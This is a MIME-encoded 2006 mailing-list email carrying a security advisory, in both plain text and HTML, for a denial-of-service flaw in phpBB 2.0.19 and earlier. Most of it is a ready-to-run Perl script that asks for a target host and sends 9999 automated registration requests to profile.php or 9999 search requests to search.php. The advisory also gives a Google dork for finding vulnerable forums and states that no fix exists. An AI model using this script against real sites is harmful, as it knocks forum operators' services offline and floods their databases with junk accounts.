------=_Part_22785_23101671.1138200225311 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline ------------------------------------------------------ HYSA-2006-001 h4cky0u.org Advisory 010 ------------------------------------------------------ Date - Wed Jan 25 2006 TITLE: =3D=3D=3D=3D=3D=3D phpBB 2.0.19 search.php and profile.php DOS Vulnerability SEVERITY: =3D=3D=3D=3D=3D=3D=3D=3D=3D High SOFTWARE: =3D=3D=3D=3D=3D=3D=3D=3D=3D phpBB 2.0.19 and prior INFO: =3D=3D=3D=3D=3D phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Support Website : http://www.phpbb.com BUG DESCRIPTION: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at - http://h4cky0u.org/viewtopic.php?t=3D637 This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts- profile.php << By registering as many users as you can. search.php << By searching in a way that the db cannot understand. Proof Of Concept Code: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D #!/usr/bin/perl ####################################### ## Recoded by: mix2mix and Elioni of http://ahg-khf.org ## And h4cky0u Security Forums (http://h4cky0u.org) ## Name: phpBBDoSReloaded ## Original Author: HaCkZaTaN of Neo Security Team ## Tested on phpBB 2.0.19 and earlier versions ## Ported to perl by g30rg3_x ## Date: 25/01/06 ####################################### use IO::Socket; ## Initialized X $x =3D 0; print q( phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group & h4cky0u Security Forums=09 ); print q(Host |without-> http://www.| ); $host =3D <STDIN>; chop ($host); print q(Path |example-> /phpBB2/ or /| ); $pth =3D <STDIN>; chop ($pth); print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If Visual Confirmation is enabled| ); $type =3D <STDIN>; chop ($type); ## Tipi p=EBr regjistrim if($type =3D=3D 1){ ## User Loop for 9999 loops (enough for Flood xDDDD) while($x !=3D 9999) { ## Antari q=EB regjistrohet automatikisht=EB "X" $uname =3D "username=3DAHG__" . "$x"; ## Emaili q=EB regjistrohet ne baz=EBn "X" $umail =3D "&email=3DAHG__" . "$x"; $postit =3D "$uname"."$umail"."%40ahg-crew.org&new_password=3D0123456&passw= ord_confirm=3D0123456&icq=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location= =3D&occupation=3D&interests=3D&signature=3D&viewemail=3D0&hideonline=3D0&no= tifyreply=3D0¬ifypm=3D1&popup_pm=3D1&attachsig=3D1&allowbbcode=3D1&allow= html=3D0&allowsmilies=3D1&language=3Denglish&style=3D2&timezone=3D0&datefor= mat=3DD+M+d%2C+Y+g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DS= ubmit"; $lrg =3D length $postit; my $sock =3D new IO::Socket::INET ( PeerAddr =3D> "$host", PeerPort =3D> "80", Proto =3D> "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Foru= ms print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; } ## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) } elsif ($type =3D=3D 2){ while($x !=3D 9999) { ## Final Search String to Send $postit =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&= search_terms=3Dany&search_author=3D&search_forum=3D-1&search_time=3D0&searc= h_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&sort_dir=3DASC&show_results= =3Dposts&return_chars=3D200"; ## Posit Length $lrg =3D length $postit; ## Connect Socket with Variables Provided By User my $sock =3D new IO::Socket::INET ( PeerAddr =3D> "$host", PeerPort =3D> "80", Proto =3D> "tcp", ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums print $sock "POST $pth"."search.php?mode=3Dresults HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=3D0.9,text/plain= ;q=3D0.8,image/png,*/*;q=3D0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; ## Increment X in One for every Loop $x++; } }else{ ## STF??? Qfar=EB keni Shtypur die "Mund=EBsia nuk Lejohet +_-???\n"; } FIX: =3D=3D=3D=3D No fix available as of date. GOOGLEDORK: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D "Powered by phpBB" CREDITS: =3D=3D=3D=3D=3D=3D=3D=3D - This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam. - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script - Web : http://ahg-khf.org mail : webmaster at ahg-khf dot org - Co Researcher - h4cky0u of h4cky0u Security Forums. mail : h4cky0u at gmail dot com web : http://www.h4cky0u.org ORIGINAL ADVISORY: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt -- http://www.h4cky0u.org (In)Security at its best... ------=_Part_22785_23101671.1138200225311 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <pre>------------------------------------------------------<br> HYSA-2= 006-001 <a href=3D"http://h4cky0u.org">h4cky0u.org</a> Advisory 010<br>----= --------------------------------------------------<br>Date - Wed Jan 25 200= 6 <br><br><br>TITLE:<br>=3D=3D=3D=3D=3D=3D<br><br>phpBB 2.0.19 search.php and= profile.php DOS Vulnerability<br><br><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D= =3D=3D=3D<br><br>High<br><br><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D<b= r><br>phpBB 2.0.19 and prior<br><br><br>INFO:<br> =3D=3D=3D=3D=3D<br><br>phpBB is a high powered, fully scalable, and highly = customizable <br>Open Source bulletin board package. phpBB has a user-frien= dly <br>interface, simple and straightforward administration panel, and <br= >helpful FAQ. Based on the powerful PHP server language and your=20 <br>choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, <b= r>phpBB is the ideal free community solution for all web sites.<br><br>Supp= ort Website : <a href=3D"http://www.phpbb.com">http://www.phpbb.com</a><br> <br><br>BUG DESCRIPTION:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D<br><br>The bug was originally found by HaCkZaTaN of NeoSecurityteam. Th= e original exploit code can be found at -<br><br><a href=3D"http://h4cky0u.= org/viewtopic.php?t=3D637">http://h4cky0u.org/viewtopic.php?t=3D637 </a><br><br>This one affected only versions uptill phpBB 2.0.15. The exploi= t code has been recoded which affects the latest version too. The bug resid= es in the following two scripts-<br><br>profile.php << By registering= as many users as you can.=20 <br>search.php << By searching in a way that the db cannot understan= d.<br><br><br>Proof Of Concept Code:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>#!/usr/bin/perl <br>##############= ######################### <br>## Recoded by: mix2mix and Elioni of=20 <a href=3D"http://ahg-khf.org">http://ahg-khf.org</a><br>## And h4cky0u S= ecurity Forums (<a href=3D"http://h4cky0u.org">http://h4cky0u.org</a>) <br>= ## Name: phpBBDoSReloaded<br>## Original Author: HaCkZaTaN of Neo Secur= ity Team=20 <br>## Tested on phpBB 2.0.19 and earlier versions<br>## Ported to perl= by g30rg3_x<br>## Date: 25/01/06<br>####################################= ### <br>use IO::Socket; <br><br>## Initialized X <br>$x =3D 0; <br><br>prin= t q( <br> phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN<br> Recoded= by Albanian Hackers Group &<br> h4cky0u Security Forums=09<br><br>); = <br>print q(Host |without-> <a href=3D"http://www.|">http://www.|</a> );= =20 <br>$host =3D <STDIN>; <br>chop ($host); <br><br>print q(Path |exampl= e-> /phpBB2/ or /| ); <br>$pth =3D <STDIN>; <br>chop ($pth); <br><= br>print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If V= isual Confirmation is enabled| );=20 <br>$type =3D <STDIN>; <br>chop ($type); <br><br>## Tipi p=EBr regjis= trim <br>if($type =3D=3D 1){ <br><br>## User Loop for 9999 loops (enough fo= r Flood xDDDD) <br>while($x !=3D 9999) <br>{ <br><br>## Antari q=EB regjist= rohet automatikisht=EB "X"=20 <br>$uname =3D "username=3DAHG__" . "$x"; <br><br>## Em= aili q=EB regjistrohet ne baz=EBn "X" <br>$umail =3D "&e= mail=3DAHG__" . "$x"; <br><br>$postit =3D "$uname"= ."$umail"."%40ahg- crew.org&new_password=3D0123456&password_confirm=3D0123456&icq= =3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location=3D&am= p;occupation=3D&interests=3D&signature=3D&viewemail=3D0&hid= eonline=3D0&notifyreply=3D0&notifypm=3D1&popup_pm=3D1&attac= hsig=3D1&allowbbcode=3D1&allowhtml=3D0&allowsmilies=3D1&lan= guage=3Denglish&style=3D2&timezone=3D0&dateformat=3DD+M+d%2C+Y+= g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DSu= bmit "; <br><br>$lrg =3D length $postit; <br><br>my $sock =3D new IO::Socke= t::INET ( <br> PeerAddr =3D> "$host= ", <br> PeerPort =3D> "80"= ;, <br> Proto =3D> "tcp", <br> = ); <br>die "\nNuk mundem te lidhemi me hostin= sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; <br><br>##= Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums= =20 <br>print $sock "POST $pth"."profile.php HTTP/1.1\n"; <= br>print $sock "Host: $host\n"; <br>print $sock "Accept: ima= ge/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-f= lash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/= msword, */*\n";=20 <br>print $sock "Referer: $host\n"; <br>print $sock "Accept-= Language: en-us\n"; <br>print $sock "Content-Type: application/x-= www-form-urlencoded\n"; <br>print $sock "Accept-Encoding: gzip, d= eflate\n";=20 <br>print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv= :1.7.8) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connect= ion: Keep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n&qu= ot;;=20 <br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock "= ;$postit\n"; <br>close($sock); <br><br>## Print a "+" for ev= ery loop <br>syswrite STDOUT, "+"; <br><br>$x++; <br>} <br><br> ## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) <br>} <br>elsif ($type =3D=3D 2){ <br= ><br>while($x !=3D 9999) <br>{ <br>## Final Search String to Send <br>$post= it =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&= amp;search_terms=3Dany&search_author=3D&search_forum=3D-1&searc= h_time=3D0&search_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&= amp;sort_dir=3DASC&show_results=3Dposts&return_chars=3D200";= =20 <br><br>## Posit Length <br>$lrg =3D length $postit; <br><br>## Connect Soc= ket with Variables Provided By User <br>my $sock =3D new IO::Socket::INET (= <br> PeerAddr =3D> "$host", <= br> PeerPort =3D> "80", <br> = Proto =3D> "tcp", <br> = ); <br>die "\nThe Socket Can't Connect To The Desi= red Host or the Host is MayBe DoSed: $!\n" unless $sock;=20 <br><br>## Sending Truth Socket The HTTP Commands For Send A BD Search Into= phpBB Forums <br>print $sock "POST $pth"."search.php?mode= =3Dresults HTTP/1.1\n"; <br>print $sock "Host: $host\n"; <br= > print $sock "Accept: text/xml,application/xml,application/xhtml+xml,te= xt/html;q=3D0.9,text/plain;q=3D0.8,image/png,*/*;q=3D0.5\n"; <br>print= $sock "Referer: $host\n"; <br>print $sock "Accept-Language:= en-us\n";=20 <br>print $sock "Content-Type: application/x-www-form-urlencoded\n&quo= t;; <br>print $sock "Accept-Encoding: gzip, deflate\n"; <br>print= $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8 ) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connection: K= eep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n"; <= br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock "= $postit\n";=20 <br>close($sock); <br><br>## Print a "+" for every loop <br>syswr= ite STDOUT, "+"; <br><br>## Increment X in One for every Loop <br= >$x++; <br>} <br>}else{ <br>## STF??? Qfar=EB keni Shtypur <br> die "= ;Mund=EBsia nuk Lejohet +_-???\n";=20 <br>}<br><br><br>FIX:<br>=3D=3D=3D=3D<br><br>No fix available as of date.<b= r><br><br>GOOGLEDORK:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>"Pow= ered by phpBB" <br><br><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D<br><br= >- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecu= rityteam. <br><br><br>- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the= latest release of the script -<br><br>Web : <a href=3D"http://ahg-khf.org"= >http://ahg-khf.org</a><br><br>mail : webmaster at ahg-khf dot org<br><br> <br>- Co Researcher -<br><br>h4cky0u of h4cky0u Security Forums.<br><br>mai= l : h4cky0u at gmail dot com<br><br>web : <a href=3D"http://www.h4cky0u.org= ">http://www.h4cky0u.org</a><br><br><br>ORIGINAL ADVISORY:<br>=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D <br><br><a href=3D"http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.tx= t">http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt</a><br><br></p= re> -- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u.org</a><br>(In= )Security at its best... ------=_Part_22785_23101671.1138200225311--